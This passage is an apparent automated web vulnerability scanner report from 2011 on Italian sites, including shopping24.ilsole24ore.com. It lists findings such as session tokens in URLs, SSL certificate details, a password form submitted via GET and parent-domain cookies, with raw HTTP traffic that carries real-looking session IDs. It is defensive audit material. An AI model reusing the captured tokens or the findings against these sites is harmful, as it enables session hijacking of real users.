<li><a href="/sh4/catalog/help/sh24-help.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09">Sei nuovo su shopping24?</a>
...[SNIP]...
<li><a href="/sh4/catalog/help/sh24-help-consegna.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09">Distribuzione e resi</a>
...[SNIP]...
<li><a href="/sh4/catalog/help/sh24-help-pagamenti.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09">Pagamenti</a>
...[SNIP]...
<li><a href="/sh4/catalog/categories/siteMap.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09">Sitemap</a>
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245309" name=""><img border="0" width='70' src='/ProductRelated/small_images/D01.gif' alt="Il Sole 24 ORE"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245309" class="title" name="">Il Sole 24 ORE</a>
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245297" name=""><img border="0" width='70' src='/ProductRelated/small_images/P02.jpg' alt="Guida Pratica Fiscale"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245297" class="title" name="">Guida Pratica Fiscale</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245309"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245297"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090087" name=""><img border="0" width='70' src='/ProductRelated/small_images/GPP06.jpg' alt="Applicando"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090087" class="title" name="">Applicando</a>
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090086" name=""><img border="0" width='70' src='/ProductRelated/small_images/gpp04.jpg' alt="Mark Up"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090086" class="title" name="">Mark Up</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090087"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090086"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH241673427" name=""><img border="0" width='70' src='/ProductRelated/small_images/P18.jpg' alt="Ambiente&amp;Sicurezza"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH241673427" class="title" name="">Ambiente&Sicurezza</a>
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245303" name=""><img border="0" width='70' src='/ProductRelated/small_images/P12.jpg' alt="Guida al Diritto"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245303" class="title" name="">Guida al Diritto</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH241673427"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245303"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH24622329" name=""><img border="0" width='70' src='/ProductRelated/small_images/P102.jpg' alt="L&#39;Impresa"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH24622329" class="title" name="">L'Impresa</a>
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245619825" name=""><img border="0" width='70' src='/ProductRelated/small_images/P105.jpg' alt="English24"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245619825" class="title" name="">English24</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH24622329"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245619825"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245866781" name=""><img border="0" width='70' src='/ProductRelated/small_images/P107.gif' alt="I Viaggi del Sole"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245866781" class="title" name="">I Viaggi del Sole</a>
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246093926" name=""><img border="0" width='70' src='/ProductRelated/big_images/gpp25.jpeg' alt="Energia24"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246093926" class="title" name="">Energia24</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245866781"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246093926"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
</p>
       <a href="/sh4/catalog/categories/allOfferte.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246140">Tutte le offerte</a>
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246093926" name="&amp;lid=gpp25&amp;lpos=offerte"><img border="0" width='70' src='/ProductRelated/big_images/gpp25.jpeg' alt="Energia24"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246093926" class="title" name="&amp;lid=gpp25&amp;lpos=offerte">Energia24</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246093926"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090084" name="&amp;lid=eda01&amp;lpos=offerte"><img border="0" width='70' src='/ProductRelated/small_images/eda01.jpg' alt="Terra e vita"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090084" class="title" name="&amp;lid=eda01&amp;lpos=offerte">Terra e vita</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090084"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245309" name="&amp;lid=D01&amp;lpos=offerte"><img border="0" width='70' src='/ProductRelated/small_images/D01.gif' alt="Il Sole 24 ORE"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245309" class="title" name="&amp;lid=D01&amp;lpos=offerte">Il Sole 24 ORE</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245309"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH24622329" name="&amp;lid=P102&amp;lpos=offerte"><img border="0" width='70' src='/ProductRelated/small_images/P102.jpg' alt="L&#39;Impresa"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH24622329" class="title" name="&amp;lid=P102&amp;lpos=offerte">L'Impresa</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH24622329"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090102" name="&amp;lid=eda02&amp;lpos=offerte"><img border="0" width='70' src='/ProductRelated/small_images/eda02.jpg' alt="Informatore Zootecnico"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090102" class="title" name="&amp;lid=eda02&amp;lpos=offerte">Informatore Zootecnico</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090102"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090104" name="&amp;lid=eda04&amp;lpos=offerte"><img border="0" width='70' src='/ProductRelated/small_images/eda04.jpg' alt="Agricommercio e Garden Center"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090104" class="title" name="&amp;lid=eda04&amp;lpos=offerte">Agricommercio e Garden Center</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090104"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090106" name="&amp;lid=eda06&amp;lpos=offerte"><img border="0" width='70' src='/ProductRelated/small_images/eda06.jpg' alt="Il Contoterzista"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090106" class="title" name="&amp;lid=eda06&amp;lpos=offerte">Il Contoterzista</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090106"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090110" name="&amp;lid=eda10&amp;lpos=offerte"><img border="0" width='70' src='/ProductRelated/small_images/eda10.jpg' alt="Macchine e Motori Agricoli"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090110" class="title" name="&amp;lid=eda10&amp;lpos=offerte">Macchine e Motori Agricoli</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090110"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...

11.8. http://www.shopping24.ilsole24ore.com/sh4/catalog/order/statoOrdine.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.shopping24.ilsole24ore.com
Path:   /sh4/catalog/order/statoOrdine.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /sh4/catalog/order/statoOrdine.jsp;jsessionid=53628C5A5A5C18CA15C1BF2309D1783D HTTP/1.1
Host: www.shopping24.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp?CATID=SH246140
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookies=true; s_lastvisit=1304392432179; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; s_cm_NW=undefinedburpburp; SC_LINKS_NW=%5B%5BB%5D%5D; JSESSIONID=53628C5A5A5C18CA15C1BF2309D1783D; ATG_SESSION_ID=53628C5A5A5C18CA15C1BF2309D1783D; s_cc=true; __utmz=30117245.1304393428.1.1.utmcsr=banchedati.ilsole24ore.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=30117245.1497251666.1304393428.1304393428.1304393428.1; __utmc=30117245; __utmb=30117245.1.10.1304393428; c=undefinedwww.banchedati.ilsole24ore.comwww.banchedati.ilsole24ore.com; s_nr=1304393455616-New; SC_LINKS_SH=S24%3Aprodotti%3APeriodici%3Ahome%5E%5E%5E%5ES24%3Aprodotti%3APeriodici%3Ahome%20%7C%20no%20%26lid%5E%5E; s_sq=s24oshoppreprod%3D%2526pid%253DS24%25253Aprodotti%25253APeriodici%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.shopping24.ilsole24ore.com/sh4/catalog/order/statoOrdine.jsp%25253Bjsessionid%25253D53628C5A5A5C18CA1%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:34:24 GMT
X-ATG-Version: ATGPlatform/9.0p1 [ DPSLicense/0 ]
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 20436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Stato ordine</t
...[SNIP]...

12. SSL certificate
There are 9 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



12.1. https://ads.bluelithium.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://ads.bluelithium.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  ad.yieldmanager.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Tue Dec 22 00:37:18 CST 2009
Valid to:  Sat Feb 21 08:00:37 CST 2015

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

12.2. https://feedback.live.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://feedback.live.com
Path:   /

Issue detail

The following problems were identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  feedback.office.microsoft.com
Issued by:  Microsoft Secure Server Authority
Valid from:  Tue Oct 12 14:57:06 CDT 2010
Valid to:  Thu Oct 11 14:57:06 CDT 2012

Certificate chain #1

Issued to:  CN=Microsoft Secure Server Authority,DC=redmond,DC=corp,DC=microsoft,DC=com
Issued by:  CN=Microsoft Internet Authority
Valid from:  Wed May 19 17:13:30 CDT 2010
Valid to:  Mon May 19 17:23:30 CDT 2014

Certificate chain #2

Issued to:  CN=Microsoft Internet Authority
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Apr 14 13:12:26 CDT 2010
Valid to:  Sat Apr 14 13:12:14 CDT 2018

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

Certificate chain #4

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

12.3. https://areaclienti187.telecomitalia.it/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://areaclienti187.telecomitalia.it
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  areaclienti187.telecomitalia.it
Issued by:  I.T. Telecom Global CA
Valid from:  Wed Nov 10 08:38:25 CST 2010
Valid to:  Thu Nov 10 08:38:25 CST 2011

Certificate chain #1

Issued to:  I.T. Telecom Global CA
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Dec 15 14:32:00 CST 2004
Valid to:  Mon Dec 15 17:59:00 CST 2014

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

12.4. https://eprocurement.eni.it/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://eprocurement.eni.it
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  eprocurement.eni.it
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Mon Dec 06 18:00:00 CST 2010
Valid to:  Wed Dec 07 17:59:59 CST 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

12.5. https://seal.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://seal.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  seal.verisign.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Tue Jul 06 19:00:00 CDT 2010
Valid to:  Sun Jul 06 18:59:59 CDT 2014

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 19:00:00 CDT 2009
Valid to:  Sun Mar 24 18:59:59 CDT 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #3

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028

12.6. https://secure.mightyblue.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.mightyblue.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.mightyblue.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Wed Nov 10 06:41:33 CST 2010
Valid to:  Wed Dec 12 21:44:19 CST 2012

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

12.7. https://ui.zanox-affiliate.de/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ui.zanox-affiliate.de
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  ui.zanox-affiliate.de
Issued by:  Thawte Premium Server CA
Valid from:  Fri Sep 25 07:35:26 CDT 2009
Valid to:  Sat Oct 01 04:09:30 CDT 2011

Certificate chain #1

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

12.8. https://www.eni.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.eni.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  WWW.ENI.COM
Issued by:  Actalis Server Authentication CA
Valid from:  Mon Oct 18 09:28:31 CDT 2010
Valid to:  Tue Oct 18 09:28:29 CDT 2011

Certificate chain #1

Issued to:  Actalis Server Authentication CA
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Apr 04 09:15:14 CDT 2007
Valid to:  Fri Apr 04 09:14:20 CDT 2014

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

12.9. https://www.webank.it/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.webank.it
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.webank.it
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Thu Jul 01 19:00:00 CDT 2010
Valid to:  Sat Jul 02 18:59:59 CDT 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2011

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13. Password field submitted using GET method

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:24:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076164456%3A203; expires=Tue, 03-May-2011 22:24:04 GMT; path=/; domain=digg.com
Set-Cookie: d=a6c9fed1b0af625d597fc8f28c424ca9628041e70e1e569b66b06472a71d7e23; expires=Sun, 02-May-2021 08:31:44 GMT; path=/; domain=.digg.com
X-Digg-Time: D=59942 10.2.129.78
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8170

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

14. Cookie scoped to parent domain
There are 70 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


14.1. http://rainbow.mythings.com/pix.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://rainbow.mythings.com
Path:   /pix.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pix.aspx?atok=zx2-2183-it&eventtype=3&aid=200&mode=html&ver=2.5&ref=&r=0.9961211793124676 HTTP/1.1
Host: rainbow.mythings.com
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 22:16:02 GMT
Expires: -1
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Microsoft-IIS/6.0
Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/
Set-Cookie: mt_zx2-2183-it=02|QwAAAB+LCAAAAAAABADsvQdgHEmWJSYvbcp7f0r1StfgdKEIgGATJNiQQBDswYjN5pLsHWlHIymrKoHKZVZlXWYWQMztnbz33nvvvffee++997o7nU4n99//P1xmZAFs9s5K2smeIYCqyB8/fnwfPyJ+cXZ+/uh73x8tsuLRR3s7Ox+NmotH3/vFefvo3sh+1DaPPtrd3bm/s7e3t/vpzt5Ho+mj3VEzpxd/yfd/yf8TAAD//5lh16VDAAAA; domain=.mythings.com; expires=Fri, 01-Jul-2011 22:16:02 GMT; path=/
Set-Cookie: cksession=424bced9-3349-491e-b41d-abd485764b45; domain=.mythings.com; path=/
Set-Cookie: ckid=e983b326-a4f8-4e01-aae3-4bac13918ccc; domain=.mythings.com; expires=Sun, 02-May-2021 22:16:02 GMT; path=/
Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/
Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/
